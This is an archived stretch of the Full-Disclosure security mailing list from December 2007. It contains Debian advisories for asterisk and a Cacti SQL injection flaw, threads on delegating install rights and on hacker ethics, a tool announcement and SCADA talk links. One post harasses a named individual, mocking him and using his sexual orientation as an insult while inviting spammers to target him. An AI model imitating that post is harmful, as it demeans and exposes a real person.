  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_mips.deb
    Size/MD5 checksum:  1694384 eebce4382cb4d77fd3d6e7016b485be0
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_mips.deb
    Size/MD5 checksum:   129960 366db74d022a19358ebd8a417f5735e1
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_mips.deb
    Size/MD5 checksum:  1661822 674635501bfd694c16e169ee5a5f4ef3

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_mipsel.deb
    Size/MD5 checksum:  1663344 1b6ba1daed2ff8bc81ac20a710cb2ee5
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_mipsel.deb
    Size/MD5 checksum:  1695762 fa651e7dada470b7704a433069ca52fd
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_mipsel.deb
    Size/MD5 checksum:   129642 20765826499d3a70cdd24685beff94d3

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_powerpc.deb
    Size/MD5 checksum:  1863288 7d0c03b1bee1a65baca621f9486737f3
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_powerpc.deb
    Size/MD5 checksum:   133018 b322ad1ee9cffad5264b2182ef843e77
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_powerpc.deb
    Size/MD5 checksum:  1824944 8aa09064033e526f86cd9fa4c99bd4ff

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_s390.deb
    Size/MD5 checksum:   136542 d344d2500a3ae56204a7df49fde483f5
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_s390.deb
    Size/MD5 checksum:  1780086 7334a3e2feb674c36c9047ead63f9caf
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_s390.deb
    Size/MD5 checksum:  1744120 29ded42531751723b0b9ce18f9f4315d

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_sparc.deb
    Size/MD5 checksum:   132140 b88c46102c3fa6e3e0984efa51e57e64
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_sparc.deb
    Size/MD5 checksum:  1663704 8162cd98c1628bdf2a61a37099f43f30
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_sparc.deb
    Size/MD5 checksum:  1631588 5fbbc2ab0bae1f4549d0186280ce170e


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHUp85Xm3vHE4uyloRAsTXAJ4uP19dVvidyti04d/W8ofTTHXrYwCcC6jN
hCe2TE4FFKOd3i2mReZa4TI=
=FbEr
-----END PGP SIGNATURE-----



From kristian.hermansen at gmail.com  Sun Dec  2 13:10:22 2007
From: kristian.hermansen at gmail.com (Kristian Erik Hermansen)
Date: Sun, 2 Dec 2007 08:10:22 -0500
Subject: [Full-disclosure] Signature or checksum?
Message-ID: <fe37588d0712020510u6a46fbd1mfbfed0a9ddf37a64@mail.gmail.com>

On Dec 2, 2007 7:00 AM,  coderman <coderman at gmail.com> wrote:
> p.s.  for the tin foil hat crowd, those digital sigs are looking
> weaker every year compared to cryptographic hash functions and block
> ciphers:
>
> http://dwave.wordpress.com/2007/11/26/slides-from-sc07-progress-in-quantum-computing-panel/
>
> not to mention GNFS improvements the last few years...

Don't forget Galois group and Fermat surface research :-P
-- 
Kristian Erik Hermansen
"I have no special talent. I am only passionately curious."



From 3lucid8 at googlemail.com  Sun Dec  2 10:38:44 2007
From: 3lucid8 at googlemail.com (3lucid8)
Date: Sun, 2 Dec 2007 10:38:44 +0000
Subject: [Full-disclosure] Phioust gets all emotional to gobbles and
	friends...
Message-ID: <8a5de94d0712020238k7150c78di5b01f16832826eb8@mail.gmail.com>

Now Lionel, "track you down.." who do you think you are? the Godfather?
Your Phd is obviously in fantasyland studies ;-)

------
Phioust means business with his real name and all those philosopher
(HAAAA), CISSP and MCSE (lol) degrees ... see for urself in his
dangerously sexy email ... in response to our spam threat :)

---------- Forwarded message ----------
From: phioust <phioust at gmail.com>
Date: Nov 30, 2007 9:33 PM
Subject: spam?
To: isbackgobbles at googlemail.com

i suggest you do not make anymore threats, belive me, i have lots of
contacts to track you down ..

-- 
Lionel Phioust

Phd, CISSP, MCSE


ohhhh f33r the b33r, he owns 100 TOR nodes, 10000 wireless hotspots
and one lesbian gmail server admin to track our IP's .. wuuuuu !!!!

Spammers - We got Phiousts real name for yaall, self pat on the back
for good work. ohhh wait wait .. lets make him a bit more jobless by
the oath of google

Lionel Phioust, security, exploits, bugtraq, scriptkiddie, lamer,
idiot, bisexual, Phioust. ROFL

Note - Some of our concerned fans suspect us not to be gobbles. I will
save all those online forensic retards the time to analyse our emails
and come straight to the point .. in w00w00 style .. 10 europeans, 15
asians, 11 americans and one hell of a funny little turkey .. 5 member
required to not f33r w00w00 might .. and no .. Shok dont look like
Marilyn Mansons gimp boy !!! .. well the gimp suite was stiched by us
..



From thijs at debian.org  Sun Dec  2 12:22:32 2007
From: thijs at debian.org (Thijs Kinkhorst)
Date: Sun, 2 Dec 2007 13:22:32 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1418-1] New cacti packages fix
	SQL injection
Message-ID: <20071202122232.GA4436@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1418-1                  security at debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
December 02, 2007                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : cacti
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2007-6035
Debian Bug     : 452085

It was discovered that Cacti, a tool to monitor systems and networks,
performs insufficient input sanitising, which allows SQL injection.

For the oldstable distribution (sarge) this problem has been fixed in
version 0.8.6c-7sarge5.

For the stable distribution (etch) this problem has been fixed in
version 0.8.6i-3.2.

For the unstable distribution (sid) this problem has been fixed in
version 0.8.7a-1.

We recommend that you upgrade your cacti package.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 3.1 (oldstable)
- ----------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c.orig.tar.gz
    Size/MD5 checksum:  1046586 b4130300f671e773ebea3b8f715912c1
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge5.diff.gz
    Size/MD5 checksum:    56568 cbd167e3cdd2711ce2910c3a47dd6d45
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge5.dsc
    Size/MD5 checksum:      887 8bfbdff5df7b79d6b8500cc9b859ac04

Architecture independent packages:

  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge5_all.deb
    Size/MD5 checksum:  1059858 fbf23e7c7829a8461dc30217f4f926bc

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz
    Size/MD5 checksum:  1122700 341b5828d95db91f81f5fbba65411d63
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.2.dsc
    Size/MD5 checksum:      873 d595d4a1e11781e46b21e6d01c434b29
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.2.diff.gz
    Size/MD5 checksum:    34884 46d229352afad9cca2fdc8e61329521e

Architecture independent packages:

  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.2_all.deb
    Size/MD5 checksum:   958872 a4156b5ff0ed3ef4251f8214dda90221


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHUqNPXm3vHE4uyloRApQoAJ991wGFAC5ZDOoAbvoTPhZYU4G4MgCg6V+U
Tj6mYk7pj4nUCYlHdo5D7d0=
=s7eM
-----END PGP SIGNATURE-----









From Billy.Hoffman at spidynamics.com  Sun Dec  2 00:18:52 2007
From: Billy.Hoffman at spidynamics.com (Billy.Hoffman at spidynamics.com)
Date: Sat, 1 Dec 2007 19:18:52 -0500 (EST)
Subject: [Full-disclosure] Web Beam,
	the new concept web application penetration testing tool
Message-ID: <200712020018.lB20HIDD026004@openbsd.nyi.net>


We are pleased to announce the result of the strategical partnership between SPI Dynamics and CORE SECURITY INC .
Paul Paget's security staff worked closely with us to integrate core impact security engine into our new Web Beam web application penetration testing tool.
Web Beam deliveries top level results in automatic web application discovery and in this new technology, the exploiting.
The platform includes an opensource licenced SDK to provide assistance in manual web vulnerability analysis that will be released on December 7th
on our website.
Web Beam includes 0day techniques for web attacks against well known enterprise grade applications widely found in intranet penetration tests.
To get an overview of the feature set of Web Beam and to signup for the Beta Testing Program download the presentation available on 
http://beam.to/WebPresentation2007.pdf


Billy Hoffman
--
Lead Researcher, SPI Labs
SPI Dynamics, An HP Company
http://www.spidynamics.com
Phone:  678-781-4800
Direct:   678-781-4845



From tbiehn at gmail.com  Sun Dec  2 15:29:20 2007
From: tbiehn at gmail.com (T Biehn)
Date: Sun, 2 Dec 2007 10:29:20 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
Message-ID: <2d6724810712020729u103c24fcnbc9b9bc24e3965e7@mail.gmail.com>

In short, this depends on the permissions needed / how the installer
determines if the user has them. The easiest thing to do is to give
local administrator access (I'm assuming Windows platform because it
sounds like it), if this is not permissible to you (as local admin
access can easily be leveraged into obtaining domain admin) then
creating a user account with the required permissions may be your best
bet, but again, any extra permissions the installer may need can
probably be used to get local administrator access, then domain
administrator access.
As you probably don't care, go ahead and look at Microsoft KB and
search around for custom user permissions (Which range from Files, to
Registry RW, to System ability to install drivers, services,
impersonate users, create users...) Of course if your installer just
looks to see if the person installing is an Administrator instead of
looking for the access, then all this trouble is for naught.

I'd be interested to know if there was something I was missing, hence the RTA.

LOLDONGS,

Travis
On Dec 2, 2007 4:42 AM, happy nino <nadtec at hotmail.com> wrote:
>
>
>
>
>  Hi All,
> i've a problem in my organization that we have several domain admins, we are
> in the process of removing most of them but i need to have a person only
> authorized to install
> new software to users' computers but without having access to other parts of
> the users machines, is this possible ?..can i delegate a function like this
> only to certain users with out
> being domain admins?
> Appreciate your great help
> thanks alot
>
> regards,
> Nad
>
>
>
>
>
> ________________________________
> Get closer to the jungle. I'm a Celebrity Get Me Out Of Here!
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From jf at danglingpointers.net  Mon Dec  3 01:47:11 2007
From: jf at danglingpointers.net (jf)
Date: Mon, 3 Dec 2007 01:47:11 +0000 (UTC)
Subject: [Full-disclosure] authentic hackers still do it for the love
 ... (was: Hell Camp: It never pays enough)
In-Reply-To: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
Message-ID: <Pine.LNX.4.64.0712030125120.20541@localhost.localdomain>

> sooner or later every authentic hacker discovers that you must
> separate work from play.

I really wish everyone would stop projecting their own world views and
insisting that in order for person A to be X you simply have to come to
the same conclusions and hold the same sets of beliefs that person B
did. In this case the noun is hacker, but the same
concept is fairly universal and happens a lot in politics as well.

Here is the simple truth, there is no underlying outlook,
background, dogma or set of ethics that define hacking. The only theme
that applies across the board is breaking computer security. Everything
else that you tie into the word is the projection of your own beliefs,
which is fine, I don't care what you believe, but don't pretend to speak
for me or to know what I'm thinking, in other words, don't put your shit
on me (or anyone else).

To sum up the point, let's say that you're I dunno southern baptist, you
don't presume that everyone else in the scene is also southern baptists,
so why do you presume to know my (or anyones) motives, ambitions, et
cetera?

> when you try and mix them both you
> betray the joy and fulfillment of hacking for a paycheck, and it
> never pays enough.

You're doing it wrong.



From Valdis.Kletnieks at vt.edu  Sun Dec  2 19:22:54 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 02 Dec 2007 14:22:54 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: Your message of "Sun, 02 Dec 2007 09:42:26 GMT."
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
Message-ID: <16569.1196623374@turing-police.cc.vt.edu>

On Sun, 02 Dec 2007 09:42:26 GMT, happy nino said:
> Hi All,i've a problem in my organization that we have several domain admins,
> we are in the process of removing most of them but i need to have a person
> only authorized to installnew software to users' computers but without having
> access to other parts of the users machines, is this possible ?

What exactly are you trying to accomplish, given that if they are allowed to
install software, they are allowed to install software that will then at a
later point in time give them access to other parts of the machine?  There's no
"don't allow the installation of trojaned software" flag.  Also, if you're
backing up the machines (you *do* back them up, right?), your admin can
probably just restore the files from backup into some other directory...

Have you looked at using something like EFS or BitLocker *and turn off key
escrow* so the admin's keys don't work?  Of course, this makes backups
"interesting", and if you have an Internal Audit group, they may have a cow
about non-escrowed keys if they have a clue.

It would probably be easier to answer this one if you were able to say
specifically what "other parts" you didn't want the admins to be getting at,
and why you can't just use "if you abuse your privs, you're fired and we're
calling the local DA" to keep them in line (this works for most places,
if you pay your admins a fair wage, but of course some particularly high-value
targets invite high-risk attacks).
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/22c007b4/attachment.bin 

From Valdis.Kletnieks at vt.edu  Sun Dec  2 19:25:02 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 02 Dec 2007 14:25:02 -0500
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
In-Reply-To: Your message of "Mon, 03 Dec 2007 01:47:11 GMT."
	<Pine.LNX.4.64.0712030125120.20541@localhost.localdomain>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
	<Pine.LNX.4.64.0712030125120.20541@localhost.localdomain>
Message-ID: <16707.1196623502@turing-police.cc.vt.edu>

On Mon, 03 Dec 2007 01:47:11 GMT, jf said:

> Here is the simple truth, there is no underlying outlook,
> background, dogma or set of ethics that define hacking. The only theme
> that applies across the board is breaking computer security.

And there's still a few hold-outs that don't agree with *that* theme either,
because "hacking" had a different meaning back in the Elder Days.

Of course, English is a living language, and terms like "hacker" and "0-day"
get redefined, despite our best efforts at preventing it.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/834bce1c/attachment.bin 

From coderman at gmail.com  Sun Dec  2 19:29:10 2007
From: coderman at gmail.com (coderman)
Date: Sun, 2 Dec 2007 11:29:10 -0800
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
In-Reply-To: <Pine.LNX.4.64.0712030125120.20541@localhost.localdomain>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
	<Pine.LNX.4.64.0712030125120.20541@localhost.localdomain>
Message-ID: <4ef5fec60712021129k6426162do9561a44ff445fa2@mail.gmail.com>

On Dec 2, 2007 5:47 PM, jf <jf at danglingpointers.net> wrote:
> ... something southern baptists ...
> You're doing it wrong.

oh well, i checked monster.com and my ruse didn't work.
no employeee exodus, no new signing bonus, and here i thought you'd all
send email notice on a pleasant saturday afternoon.

guess i'll have to pay for that CISSP after all...

[tell you what jf and pdp, i'd be more curious to know how you
 cultivated that "job" that isn't yet pays well than continuing this
 thread before it spirals further into inanity...]



From nytrokiss at gmail.com  Sun Dec  2 19:34:01 2007
From: nytrokiss at gmail.com (James Matthews)
Date: Sun, 2 Dec 2007 20:34:01 +0100
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <16569.1196623374@turing-police.cc.vt.edu>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
Message-ID: <8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>

Why are you removing the admins? based on what you wrote the computer
network will probably turn into a massive mess with all these programs
installed and users as admins..

On Dec 2, 2007 8:22 PM, <Valdis.Kletnieks at vt.edu> wrote:

> On Sun, 02 Dec 2007 09:42:26 GMT, happy nino said:
> > Hi All,i've a problem in my organization that we have several domain
> admins,
> > we are in the process of removing most of them but i need to have a
> person
> > only authorized to installnew software to users' computers but without
> having
> > access to other parts of the users machines, is this possible ?
>
> What exactly are you trying to accomplish, given that if they are allowed
> to
> install software, they are allowed to install software that will then at a
> later point in time give them access to other parts of the machine?
>  There's no
> "don't allow the installation of trojaned software" flag.  Also, if you're
> backing up the machines (you *do* back them up, right?), your admin can
> probably just restore the files from backup into some other directory...
>
> Have you looked at using something like EFS or BitLocker *and turn off key
> escrow* so the admin's keys don't work?  Of course, this makes backups
> "interesting", and if you have an Internal Audit group, they may have a
> cow
> about non-escrowed keys if they have a clue.
>
> It would probably be easier to answer this one if you were able to say
> specifically what "other parts" you didn't want the admins to be getting
> at,
> and why you can't just use "if you abuse your privs, you're fired and
> we're
> calling the local DA" to keep them in line (this works for most places,
> if you pay your admins a fair wage, but of course some particularly
> high-value
> targets invite high-risk attacks).
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://search.goldwatches.com/?Search=Movado+Watches
http://www.jewelerslounge.com
http://www.goldwatches.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/5bd46c52/attachment.html 

From nytrokiss at gmail.com  Sun Dec  2 19:35:12 2007
From: nytrokiss at gmail.com (James Matthews)
Date: Sun, 2 Dec 2007 20:35:12 +0100
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
In-Reply-To: <4ef5fec60712021129k6426162do9561a44ff445fa2@mail.gmail.com>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
	<Pine.LNX.4.64.0712030125120.20541@localhost.localdomain>
	<4ef5fec60712021129k6426162do9561a44ff445fa2@mail.gmail.com>
Message-ID: <8a6b8e350712021135o7e96e8d9l54403728051796b7@mail.gmail.com>

Correct there must be a separation between work and play! But playing will
always be fun!

On Dec 2, 2007 8:29 PM, coderman <coderman at gmail.com> wrote:

> On Dec 2, 2007 5:47 PM, jf <jf at danglingpointers.net> wrote:
> > ... something southern baptists ...
> > You're doing it wrong.
>
> oh well, i checked monster.com and my ruse didn't work.
> no employeee exodus, no new signing bonus, and here i thought you'd all
> send email notice on a pleasant saturday afternoon.
>
> guess i'll have to pay for that CISSP after all...
>
> [tell you what jf and pdp, i'd be more curious to know how you
>  cultivated that "job" that isn't yet pays well than continuing this
>  thread before it spirals further into inanity...]
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://search.goldwatches.com/?Search=Movado+Watches
http://www.jewelerslounge.com
http://www.goldwatches.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/28c87e0a/attachment.html 

From Valdis.Kletnieks at vt.edu  Sun Dec  2 20:23:05 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 02 Dec 2007 15:23:05 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: Your message of "Sun, 02 Dec 2007 20:34:01 +0100."
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
Message-ID: <20494.1196626985@turing-police.cc.vt.edu>

On Sun, 02 Dec 2007 20:34:01 +0100, James Matthews said:

> Why are you removing the admins? based on what you wrote the computer
> network will probably turn into a massive mess with all these programs
> installed and users as admins..

Actually, my first guess is that Happy Nino is trying to *clean up* a network
that's infected with users-as-admins, and he's just discovered that if you
don't let the users be admins, somebody *else* has to install the software...
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/15845d67/attachment.bin 

From tbiehn at gmail.com  Sun Dec  2 20:32:22 2007
From: tbiehn at gmail.com (T Biehn)
Date: Sun, 2 Dec 2007 15:32:22 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <20494.1196626985@turing-police.cc.vt.edu>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
	<20494.1196626985@turing-police.cc.vt.edu>
Message-ID: <2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>

Clearly stated, he was cleaning up DOMAIN Administrators, which can,
you know, Administer all the computers on the domain.

*Obviously*

I guess we'll all just denounce our friend here for even thinking he
could ask a question as STUPID and RIDICULOUS as this one, instead of
actually knowing or thinking about one could do.

Man, I sure am glad I got my MCSE, CSSIP, CUSSE (yeah I dropped it)
CERTIFICATION SOUP.

Love,

Travis

On Dec 2, 2007 3:23 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Sun, 02 Dec 2007 20:34:01 +0100, James Matthews said:
>
> > Why are you removing the admins? based on what you wrote the computer
> > network will probably turn into a massive mess with all these programs
> > installed and users as admins..
>
> Actually, my first guess is that Happy Nino is trying to *clean up* a network
> that's infected with users-as-admins, and he's just discovered that if you
> don't let the users be admins, somebody *else* has to install the software...
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From tbiehn at gmail.com  Sun Dec  2 20:35:34 2007
From: tbiehn at gmail.com (T Biehn)
Date: Sun, 2 Dec 2007 15:35:34 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
	<20494.1196626985@turing-police.cc.vt.edu>
	<2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
Message-ID: <2d6724810712021235v63d58f9by58452d5cbf8a4cee@mail.gmail.com>

Forgot to address one part of the question in my response:
Q: new software to users' computers but without having access to other
parts of the users machines, is this possible ?

A: Yes, this is easy, use EFS & set security perms so that the
installer can't access the files. Remember to generate backups of the
keys AND OR assign a backup agent (All in the microsoft KB).

On Dec 2, 2007 3:32 PM, T Biehn <tbiehn at gmail.com> wrote:
> Clearly stated, he was cleaning up DOMAIN Administrators, which can,
> you know, Administer all the computers on the domain.
>
> *Obviously*
>
> I guess we'll all just denounce our friend here for even thinking he
> could ask a question as STUPID and RIDICULOUS as this one, instead of
> actually knowing or thinking about one could do.
>
> Man, I sure am glad I got my MCSE, CSSIP, CUSSE (yeah I dropped it)
> CERTIFICATION SOUP.
>
> Love,
>
> Travis
>
>
> On Dec 2, 2007 3:23 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> > On Sun, 02 Dec 2007 20:34:01 +0100, James Matthews said:
> >
> > > Why are you removing the admins? based on what you wrote the computer
> > > network will probably turn into a massive mess with all these programs
> > > installed and users as admins..
> >
> > Actually, my first guess is that Happy Nino is trying to *clean up* a network
> > that's infected with users-as-admins, and he's just discovered that if you
> > don't let the users be admins, somebody *else* has to install the software...
> >
> > _______________________________________________
>
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>



From Valdis.Kletnieks at vt.edu  Sun Dec  2 21:04:10 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 02 Dec 2007 16:04:10 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: Your message of "Sun, 02 Dec 2007 15:32:22 EST."
	<2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
	<20494.1196626985@turing-police.cc.vt.edu>
	<2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
Message-ID: <23107.1196629450@turing-police.cc.vt.edu>

On Sun, 02 Dec 2007 15:32:22 EST, T Biehn said:
> Clearly stated, he was cleaning up DOMAIN Administrators, which can,
> you know, Administer all the computers on the domain.

What, you don't think that some people are unfortunate enough to be newcomers
to the field, and their first assignment is to clean up a net that an even
less clued predecessor set up with 'users-as-domain-admins' because the
previous guy didn't know the difference between -as-admin and -as-domain-admin?

> I guess we'll all just denounce our friend here for even thinking he
> could ask a question as STUPID and RIDICULOUS as this one, instead of
> actually knowing or thinking about one could do.

Keep in mind that we were *all* that clueless at one time.  For some of us,
it was 30 years ago, for others it's 30 hours ago.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/56ced9fc/attachment.bin 

From pauls at utdallas.edu  Sun Dec  2 21:15:04 2007
From: pauls at utdallas.edu (Paul Schmehl)
Date: Sun, 02 Dec 2007 15:15:04 -0600
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <23107.1196629450@turing-police.cc.vt.edu>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
	<20494.1196626985@turing-police.cc.vt.edu>
	<2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
	<23107.1196629450@turing-police.cc.vt.edu>
Message-ID: <9F2494F1624399AA1711F282@paul-schmehls-powerbook59.local>

--On December 2, 2007 4:04:10 PM -0500 Valdis.Kletnieks at vt.edu wrote:
>
>> I guess we'll all just denounce our friend here for even thinking he
>> could ask a question as STUPID and RIDICULOUS as this one, instead of
>> actually knowing or thinking about one could do.
>
> Keep in mind that we were *all* that clueless at one time.  For some of
> us, it was 30 years ago, for others it's 30 hours ago.

Yes, but, in IT, we eat our young.

Paul Schmehl (pauls at utdallas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/



From gmaggro at rogers.com  Mon Dec  3 00:52:17 2007
From: gmaggro at rogers.com (gmaggro)
Date: Sun, 02 Dec 2007 19:52:17 -0500
Subject: [Full-disclosure] SCADA refresher
In-Reply-To: <47505E42.90503@rogers.com>
References: <47505E42.90503@rogers.com>
Message-ID: <47535341.6060206@rogers.com>

Been giving myself a little refresher on SCADA, hope no-one minds the MLP.

Stock presentation on SCADA security issues:

http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf

Ganesh Devarajan's Defcon presentation was interesting:
  http://video.google.com/videoplay?docid=2434649448102709100&hl=en

Makes of SCADA and related products I have seen in actual use:
  Allen Bradley	(hardware)
  Siemens	(hardware)
  RAND		(hardware)
  ABB		(hardware)
  Wonderware	(software, assuming this was what Ganesh was assaulting)

